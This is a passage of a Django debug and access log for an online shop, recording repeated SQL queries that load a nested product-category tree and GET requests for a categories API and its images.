"shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 10:37:50,408 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 10:37:50,411 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 10:37:50] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 10:37:51] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 10:37:51] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-19 10:39:15,720 utils 4252 140031482124032 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 10:39:15,727 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 10:39:15,730 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 10:39:15,732 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 10:39:15,736 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 10:39:15,738 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 10:39:15,740 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 10:39:15,743 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 10:39:15,745 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 10:39:15,748 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 10:39:15,750 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 10:39:15,753 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 10:39:15,755 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 10:39:15,758 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 10:39:15,761 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 10:39:15,763 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 10:39:15,766 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 10:39:15,768 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 10:39:15,770 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 10:39:15,774 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 10:39:15,776 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 10:39:15,778 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 10:39:15,780 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 10:39:15,782 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 10:39:15,784 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 10:39:15,788 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 10:39:15,790 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 10:39:15,792 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 10:39:15,796 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 10:39:15,799 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 10:39:15,805 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 10:39:15,808 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 10:39:15,812 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 10:39:15,816 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 10:39:15,819 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 10:39:15,825 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 10:39:15,829 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 10:39:15,832 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 10:39:15,836 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 10:39:15,839 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 10:39:15,843 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 10:39:15,847 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 10:39:15,851 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 10:39:15,854 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 10:39:15,859 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 10:39:15,861 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 10:39:15] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 10:39:16] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 10:39:16] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 10:41:46] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 10:42:50,308 utils 4252 140031482124032 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 10:42:50,315 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 10:42:50,319 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 10:42:50,321 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 10:42:50,325 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 10:42:50,327 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 10:42:50,329 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 10:42:50,332 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 10:42:50,334 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 10:42:50,339 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 10:42:50,341 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 10:42:50,343 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 10:42:50,345 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 10:42:50,347 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 10:42:50,350 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 10:42:50,353 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 10:42:50,355 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 10:42:50,357 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, 